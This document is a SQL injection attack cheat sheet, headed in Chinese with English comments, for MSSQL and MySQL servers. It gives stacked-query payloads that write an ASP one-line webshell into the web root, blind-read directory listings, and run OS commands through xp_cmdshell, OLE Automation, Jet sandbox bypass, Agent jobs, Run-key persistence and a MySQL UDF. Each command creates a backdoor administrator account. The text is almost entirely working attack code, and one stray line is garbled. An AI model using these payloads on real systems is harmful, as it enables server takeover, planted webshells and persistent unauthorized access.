MSSQL语句导出一句话木马
首先确定网站的 WEB 物理路径（例如下面示例中的 E:\Inetpub\wwwroot），因为导出的文件必须落在 Web 根目录下才能被访问到。
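-- Export a one-line ASP webshell through sp_makewebtask.
-- Preconditions: the injected login is sysadmin (sp_makewebtask and the
-- file write both require it), the physical web root is known, and the
-- SQL Server service account can write into that directory.
-- NOTE: sp_makewebtask was deprecated in SQL Server 2005 and removed in
-- 2008; on those and later versions this technique does not apply.
-- Each statement starts with ';' and ends with '--' because it is stacked
-- onto an existing injected query.

-- 1) Staging table that holds the shell text.
--    varchar instead of the original char(255) so the exported value is
--    not padded with trailing spaces.
;create table pcguest(pc varchar(255));--

-- 2) Insert the shell.  The literal is the URL-encoded form of
--    <%execute request("p")%>; it assumes the payload travels through a
--    URL parameter that the web server decodes before it reaches SQL.
--    If the query is sent directly to the database, insert the decoded
--    text instead, or the file will contain the %xx sequences verbatim.
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--

-- 3) Write the table contents out as a file under the web root.
--    sp_makewebtask wraps the result set in HTML; the <% %> block inside
--    is still executed by ASP when PC.ASP is requested.
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--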
关于 MSSQL 列目录（利用 xp_dirtree，并通过布尔盲注逐行读回结果）
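-- Directory listing via xp_dirtree, read back blind (boolean-based).
-- xp_dirtree runs as the SQL Server service account, so it can only list
-- what that account can read.  The 3-argument form (path, depth,
-- include-files) returns the columns subdirectory / depth / file, which is
-- the shape pctest is created with.

-- Staging table for the listing.
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100));--

-- Populate it.  FIX: the original wrote the path as "d:\app\" in double
-- quotes, which is only a string literal when QUOTED_IDENTIFIER is OFF;
-- with it ON (the default for most client connections) it is parsed as an
-- identifier and the statement fails.  Single quotes work in both modes.
;INSERT pctest EXEC master..xp_dirtree 'd:\app\',1,1;--

-- Row count = number of entries (files + subdirectories) returned.
-- Narrow the BETWEEN range to find the exact count.
and (select Count(1) from [pctest]) between 0 and 99

-- Length of the 2nd entry.  "Top 2 ... ORDER BY asc" then
-- "Top 1 ... ORDER BY desc" selects row #2; change the inner Top N to
-- walk through the rows.  The value is [file] (xp_dirtree's is-file flag,
-- 1 = file, 0 = directory) concatenated with the entry name.
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20

-- Character-at-a-time extraction of the 1st entry: unicode() of the
-- character at position 1, bisected with BETWEEN; increase the substring
-- offset (the ",1,1") to read the next character.
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130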
数据库版本和权限查看（先确认当前注入点的账号是否为 sysadmin / db_owner，后面的各种命令执行手法都依赖 sysadmin 权限）
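-- Fingerprint the server and the privileges of the injected login.
-- All of the command-execution techniques that follow need sysadmin, so
-- check this first.

-- Error-based: comparing int 1 with the @@VERSION string forces a
-- conversion error whose message echoes the full version banner.
and 1=(select @@VERSION)

-- Boolean: IS_SRVROLEMEMBER returns 1 (member), 0 (not a member) or NULL
-- (login/role not found); the condition is true only for 1, i.e. sysadmin
-- (sa or an equivalent login).
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--

-- Boolean: 1 when the login is db_owner of the current database.
and 1=(SELECT IS_MEMBER('db_owner'));--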
1. 利用 xp_cmdshell 执行命令（需要 sysadmin；命令以 SQL Server 服务账号的身份运行）
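-- 1. Command execution via xp_cmdshell.
-- Needs sysadmin (or an explicit grant on xp_cmdshell).  The commands run
-- as the SQL Server service account (or its configured proxy account), so
-- adding a user / local admin only works if that account is privileged
-- enough on the host.
exec master..xp_cmdshell 'net user rfire 123456 /add'
exec master..xp_cmdshell 'net localgroup administrators rfire /add'

-- Restoring xp_cmdshell after the extended procedure was dropped.
-- This re-registers it from xplog70.dll, which must still be present in
-- the instance's Binn directory.
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

-- On SQL Server 2005 and later xp_cmdshell is shipped but disabled by
-- default; it is re-enabled through sp_configure, not by re-registering:
--   EXEC sp_configure 'show advanced options',1; RECONFIGURE;
--   EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;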
2.利用SP_OAcreate和SP_OAMETHOD执行命令
适用于 wscript.shell 组件存在、而 xp_cmdshell 和 xplog70.dll 都已被删除的情况；同样需要 sysadmin 权限，SQL Server 2005 及以后还需先用 sp_configure 打开 'Ole Automation Procedures'。
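-- 2. Command execution via OLE Automation (sp_OACreate / sp_OAMethod).
-- Used when xp_cmdshell and xplog70.dll are gone but WScript.Shell is
-- still registered on the host.  Needs sysadmin; on SQL Server 2005+ the
-- 'Ole Automation Procedures' option must also be enabled via sp_configure.
-- The command still executes as the SQL Server service account.
DECLARE @shell INT                                               -- handle to the COM object
EXEC SP_OAcreate 'wscript.shell',@shell out                     -- instantiate WScript.Shell; non-zero return = failure
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add'  -- call WScript.Shell.Run(cmd); return value discarded
-- The original never releases the object; sp_OADestroy @shell afterwards
-- avoids leaking the COM handle in the session.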
" T" A; A) ]) s
3. 利用 Jet 沙盒模式
先利用 xp_regwrite（前提是 xp_regwrite 存在且当前账号为 sysadmin）修改注册表关闭 Jet 的沙盒模式，然后用 OpenRowSet 通过 Jet OLE DB 驱动访问系统自带的 mdb 文件，并在其中执行带 shell() 的 Jet 查询。
关闭沙盒模式（SandBoxMode=0）:
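-- 3. Command execution through the Jet engine's sandbox mode.

-- Step 1: take the Jet engine out of sandbox mode (SandBoxMode = 0) so
-- Jet expressions are allowed to call shell().  xp_regwrite needs
-- sysadmin and writes to the host registry as the service account.
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0

-- Step 2: open a local .mdb through the Jet OLE DB provider and run a Jet
-- query whose expression is shell(...).
-- Caveats: the .mdb path must exist on the server (ias.mdb is the IAS
-- database, which is not present on every Windows build); OpenRowSet
-- needs 'Ad Hoc Distributed Queries' enabled on SQL Server 2005+; and the
-- Jet 4.0 provider is 32-bit only, so a 64-bit instance cannot load it.
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');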
4. 利用 SQL Server 代理（SQLSERVERAGENT）执行命令
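-- 4. Command execution through a SQL Server Agent job (CMDEXEC step).
-- Needs sysadmin (or the relevant msdb roles) and an Agent service that
-- can be started; the job step runs as the Agent service account.

-- Start the Agent if it is stopped.  xp_servicecontrol is undocumented
-- and requires sysadmin.
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

-- Create and run the job in msdb.
use msdb
-- Drop any earlier job named 'x' so sp_add_job does not fail on a
-- duplicate name (raises a non-fatal error if no such job exists).
exec sp_delete_job null,'x'
exec sp_add_job 'x'
-- Step 1 of job 'x': CMDEXEC subsystem, runs the command line verbatim.
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add'
-- Target the local server.
exec sp_add_jobserver Null,'x',@@servername
-- FIX: the original repeated "exec sp_add_job 'x'" here, which errors on
-- the duplicate name and never runs anything; sp_start_job is what
-- actually launches the job.
exec sp_start_job 'x'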
5. 利用注册表启动项执行命令（用 xp_regwrite 把命令写入 HKLM 的 Run 键；命令不会立即执行，而是在下一次有用户交互登录时以该用户身份运行）
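-- 5. Persistence via an HKLM Run value written with xp_regwrite (sysadmin).
-- The command does not run immediately: Run entries fire at the next
-- interactive logon, in that user's security context.
-- FIXES vs. the original line: xp_regwrite's first argument is the root
-- key, which was missing; the value name and type were joined with '.'
-- instead of ','; and the trailing '\' on the subkey path is dropped.
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','shell','REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'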
6. MySQL 的命令执行
MySQL 的 UDF 自定义函数提权（要求账号对 mysql.func 表拥有 insert 和 delete 权限，分别对应 CREATE FUNCTION 和 DROP FUNCTION）
首先通过 su.php 把 udf.dll 导出到 c:\windows\udf.dll（MySQL 5.1 及以后版本必须放到 plugin_dir 指定的目录，否则 CREATE FUNCTION 会拒绝加载）
导出后执行创建自定义函数命令:
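-- 6. MySQL: command execution via a user-defined function (UDF).
-- Preconditions: the shared library (udf.dll) has already been written to
-- a directory MySQL will load from, the account can INSERT into and DELETE
-- from mysql.func (what CREATE/DROP FUNCTION need), and the library exports
-- a symbol matching the function name.  On MySQL 5.1+ the library must
-- live in plugin_dir (SHOW VARIABLES LIKE 'plugin_dir'); c:\windows\ is
-- only accepted by older versions.  The command runs as the mysqld
-- service account.
CREATE FUNCTION cmdshell RETURNS STRING SONAME 'udf.dll';

-- Run a command through the new function.
SELECT cmdshell('net user rfire 123456 /add');

-- Remove the function afterwards so it is not left behind in mysql.func.
DROP FUNCTION cmdshell;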